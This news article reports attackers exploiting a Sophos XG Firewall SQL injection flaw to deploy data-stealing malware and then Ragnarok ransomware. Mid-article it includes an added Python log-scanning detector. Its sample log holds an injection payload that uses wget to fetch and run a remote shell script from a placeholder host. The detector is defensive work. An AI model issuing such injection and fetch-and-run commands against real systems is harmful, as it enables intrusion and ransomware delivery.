22 May 2020

Hackers attempted to exploit zero-day flaw in Sophos firewall to deploy ransomware

British security software and hardware company Sophos has published an update on its investigation into recent cyber attacks in which threat actors attempted to exploit an SQL injection flaw (CVE-2020-12271) in its XG Firewall devices to deploy the Asnarök malware. This trojan was used to steal data from the firewall that could have allowed the attackers to compromise the network remotely.

According to Sophos, after the company issued a hotfix to remediate the issue, the attackers modified their attack routine, replacing their original data-stealing payload with one that deploys ransomware on Windows machines in corporate networks with Sophos firewalls installed.

“In the hours after Sophos issued hotfixes that secured firewalls targeted by unknown threat actors, the attackers pivoted to a new phase of the attack, adding new components—including files intended to spread ransomware to unpatched Windows machines inside the network. Unfortunately for the threat actors, the hotfixes also prevented the subsequent attempted attacks,” Sophos said.

The original attacks took place in late April this year. In a report published at the time, the company said the attackers had identified and exploited the SQL injection vulnerability to insert a one-line command into the firewall database. This command caused affected devices to download a Linux shell script named Install.sh from a remote server. The script then executed more SQL commands and dropped more files onto the virtual file system.
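The chain described above (input that breaks out of an SQL statement and carries a command to fetch and run a remote shell script) leaves a recognisable trace in request logs. The following detector is an added example for this article, not Sophos's own code or tooling; the log format it parses, the sample lines, and the hostnames and paths in them are all constructed for illustration. It decodes each request's query string and flags the SQL-injection pattern alone as medium severity, and the pattern combined with a download tool or a `.sh` filename as high severity.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not real Sophos logs). The layout
# "<client-ip> <method> <path?query> <status>" is an assumption for this example.
SAMPLE_LOG = """\
203.0.113.5 GET /portal?json=%7B%22username%22%3A%22alice%22%7D 200
198.51.100.7 POST /login?user=bob'%20AND%201=1-- 200
198.51.100.9 POST /api?q=x';%20INSERT%20INTO%20jobs%20VALUES('wget%20http://example.invalid/Install.sh%20-O%20/tmp/x.sh;sh%20/tmp/x.sh');-- 500
192.0.2.4 GET /index.jsp 200
"""

# A quote followed by a statement terminator, comment marker or SQL keyword:
# the signature of input breaking out of a string literal.
SQLI_RE = re.compile(
    r"'\s*(?:;|--|\b(?:or|and|union|select|insert|update|delete)\b)", re.I
)
# Shell download tooling or a shell-script filename inside a request parameter.
DOWNLOAD_RE = re.compile(r"\b(?:wget|curl)\b", re.I)
SCRIPT_RE = re.compile(r"\.sh\b", re.I)

LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\d{3})$")


def classify_request(query: str):
    """Return (severity, reasons) for one decoded query string, or (None, [])."""
    reasons = []
    if SQLI_RE.search(query):
        reasons.append("sql-injection pattern")
    if not reasons:
        return None, []
    if DOWNLOAD_RE.search(query):
        reasons.append("download tool in payload")
    if SCRIPT_RE.search(query):
        reasons.append("shell script referenced")
    # Injection that also carries a fetch-and-run stage is the more urgent case.
    severity = "high" if len(reasons) > 1 else "medium"
    return severity, reasons


def scan_log(text: str):
    """Parse log lines, decode each query string and return findings per request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than aborting the whole scan
        ip, method, target, status = m.groups()
        _, _, raw_query = target.partition("?")
        query = unquote_plus(raw_query)
        severity, reasons = classify_request(query)
        if severity:
            findings.append({"ip": ip, "method": method, "severity": severity,
                             "status": int(status), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['ip']:15} {f['method']:4} {', '.join(f['reasons'])}")
```

Running the block prints one medium finding for the bare injection probe and one high finding for the request that also names a download tool and a `.sh` file; the JSON-carrying request and the plain page fetch are left alone. The patterns are deliberately narrow so the output stays reviewable; in production this logic would sit behind the input validation and parameterised queries that prevent the injection in the first place, not replace them.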

In the new report, Sophos revealed that after learning of the hotfix the attackers began altering their scripts on hacked firewalls to use a "dead man's switch" (a Linux shell script) that would trigger the ransomware attack if a specific file the attackers had created was deleted, or if the firewall was rebooted. Sophos blocked this attack by deleting the malicious scripts and applications, which prompted the attackers to change their plans once again.

In the new attack, the threat actors attempted to deploy Ragnarok ransomware to vulnerable Windows machines on the network using the EternalBlue exploit (a Windows SMB exploit that lets attackers infect computers on the internal network beyond the firewall) and the DoublePulsar implant, a Windows kernel implant that can be used to gain a foothold on computers on the internal network.

“The EternalBlue exploit, as implemented by the attackers in this attack, cannot infect computers running Windows 8.1 or Windows 10. The attack only succeeds against computers running older, unpatched versions of Windows 7. As a matter of course, Sophos urges everyone to patch any vulnerable machines on their network,” Sophos said.

“This incident highlights the necessity of keeping machines inside the firewall perimeter up to date, and serves as a reminder that any IOT device could be abused as a foothold to reach Windows machines,” the company added.
